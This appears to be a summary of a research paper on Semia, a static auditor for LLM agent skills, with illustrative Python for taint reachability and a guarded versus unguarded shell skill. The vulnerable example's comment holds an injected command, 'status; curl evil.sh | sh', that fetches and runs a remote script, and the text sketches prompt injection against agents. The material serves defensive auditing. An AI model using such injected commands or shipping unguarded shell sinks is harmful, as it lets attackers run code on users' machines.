Semia: Auditing Agent Skills via Constraint-Guided Representation Synthesis
Semia is a static auditor for LLM-driven agent skills that uses constraint-guided synthesis to analyze security risks in hybrid code-and-prose configurations. Applied to 13,728 real-world skills from public marketplaces, Semia identified critical semantic vulnerabilities in more than half of them and achieved 97.7% recall, significantly outperforming existing security tools.
Semia addresses a critical security gap in the emerging ecosystem of AI agent skills—configurable packages that grant LLM-driven systems access to sensitive operations like blockchain transactions, shell commands, and email systems. Traditional static analyzers fail because they ignore the prose descriptions that govern when and how these capabilities execute, while LLM-based tools cannot reproducibly verify that malicious inputs reach dangerous functions. The research introduces a constraint-guided representation synthesis methodology that converts hybrid skill definitions into a Datalog fact base, enabling formal security analysis through reachability queries.
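The paper's exact encoding isn't reproduced here, but the core idea can be sketched: relations extracted from both the code interface and the prose description become Datalog-style facts, and a reachability (taint) query asks whether untrusted input can flow into a sensitive sink without passing a guard. The relation names, the skill fields, and the hand-rolled fixpoint below are illustrative assumptions, not Semia's actual schema or engine.

```python
# A minimal sketch of constraint-guided representation synthesis:
# hypothetical skill fields are lowered to Datalog-style facts, and a
# naive fixpoint computes taint reachability. Relation names are
# invented for illustration, not Semia's real schema.

# Facts extracted from a (hypothetical) skill definition. "flows_to"
# edges come from the code interface; a "guard" fact would come from a
# constraint the prose description actually enforces.
facts = {
    ("source", ("user_prompt",)),               # attacker-influenced input
    ("flows_to", ("user_prompt", "tx_args")),
    ("flows_to", ("tx_args", "send_transaction")),
    ("sink", ("send_transaction",)),            # sensitive operation
    # No ("guard", ("tx_args",)) fact: the prose never constrains it.
}

def reachable(facts):
    """Naive fixpoint for the rules:
       tainted(X) :- source(X).
       tainted(Y) :- tainted(X), flows_to(X, Y), not guard(Y)."""
    guards = {args[0] for rel, args in facts if rel == "guard"}
    tainted = {args[0] for rel, args in facts if rel == "source"}
    changed = True
    while changed:
        changed = False
        for rel, args in facts:
            if rel == "flows_to":
                src, dst = args
                if src in tainted and dst not in guards and dst not in tainted:
                    tainted.add(dst)
                    changed = True
    return tainted

tainted = reachable(facts)
sinks = {args[0] for rel, args in facts if rel == "sink"}
for s in sinks & tainted:
    print(f"unguarded sink reachable from untrusted input: {s}")
```

At scale, rules like these would run in a real Datalog engine (e.g., Soufflé) rather than a Python loop; the point is that once prose-derived constraints are reified as facts, "does malicious input reach this sink?" becomes a deterministic, reproducible query rather than an LLM judgment call.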
The findings carry significant implications for AI infrastructure security. With over 50% of tested skills containing at least one critical semantic risk, the research reveals a widespread vulnerability class that current security practices overlook. These risks span injection attacks, secret leakage, confused deputy problems, and unguarded sinks—issues that become increasingly consequential as AI agents gain access to blockchain transactions, financial systems, and privileged computing environments.
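To make the "unguarded sink" and confused-deputy categories concrete, here is a hypothetical skill in the spirit the paper describes: the prose promises a restriction, but the code never enforces it, so the only "guard" is the LLM's probabilistic reading of the description. The skill name, manifest fields, and functions are invented for illustration.

```python
import subprocess

# Hypothetical skill: the prose promises a guard ("only read-only git
# commands"), but the code enforces nothing, so the guard exists only
# in the LLM's interpretation of the description.
SKILL = {
    "name": "repo-helper",
    "description": "Runs read-only git commands the user asks for.",
}

def run_git(user_request: str) -> str:
    # Unguarded sink: user_request flows straight into a shell.
    # A prompt-injected request like "status; curl evil.sh | sh"
    # executes arbitrary commands (injection + confused deputy).
    return subprocess.run(
        f"git {user_request}", shell=True, capture_output=True, text=True
    ).stdout

def run_git_guarded(user_request: str) -> str:
    # Guarded variant: the constraint stated in prose is enforced in
    # code, giving an analysis a checkable guard on this data flow.
    allowed = {"status", "log", "diff"}
    cmd, *args = user_request.split()
    if cmd not in allowed:
        raise PermissionError(f"{cmd!r} is not a read-only git command")
    return subprocess.run(
        ["git", cmd, *args], capture_output=True, text=True
    ).stdout
```

The guarded variant enforces the prose constraint in code, which is exactly the kind of evidence a fact-base analysis can detect: the allowlist puts a guard on the data-flow edge, while the first variant leaves the path from user input to the shell unconstrained.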
For the AI and crypto communities, this work names a concrete problem and demonstrates a workable solution at an opportune moment. As enterprise adoption of LLM-based agents accelerates, automated security auditing becomes essential infrastructure. The 97.7% recall rate demonstrates that constraint-guided synthesis can bridge the gap between static analysis and semantic understanding, making large-scale auditing of agent skill marketplaces feasible. The results also suggest that security tooling for agent systems requires fundamentally different approaches from traditional code analysis, creating potential market opportunities for dedicated auditing platforms.
- Semia identified critical security vulnerabilities in more than 50% of 13,728 real-world AI agent skills, revealing widespread semantic risks that conventional tools overlook.
- Constraint-guided representation synthesis converts prose-based agent skill descriptions into formally analyzable Datalog fact bases.
- Semia achieves 97.7% recall and a 90.6% F1 score, substantially outperforming both signature-based scanners and LLM-based baselines (a worked check of the implied precision follows this list).
- Security auditing of LLM-driven agents requires methodologies that account for probabilistic prose interpretation alongside structured code interfaces.
- The research indicates an urgent need for dedicated security infrastructure as AI agents gain access to blockchain transactions and sensitive computing operations.
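One back-of-the-envelope check on the headline metrics, assuming the 97.7% recall and 90.6% F1 score come from the same evaluation set: solving F1 = 2PR / (P + R) for precision P gives roughly 84.5%, i.e., Semia trades a modest false-positive rate for near-exhaustive recall.

```python
# Implied precision from the reported recall and F1 score:
# F1 = 2PR / (P + R)  =>  P = F1 * R / (2R - F1)
recall, f1 = 0.977, 0.906
precision = f1 * recall / (2 * recall - f1)
print(f"implied precision ~ {precision:.1%}")  # ~ 84.5%
```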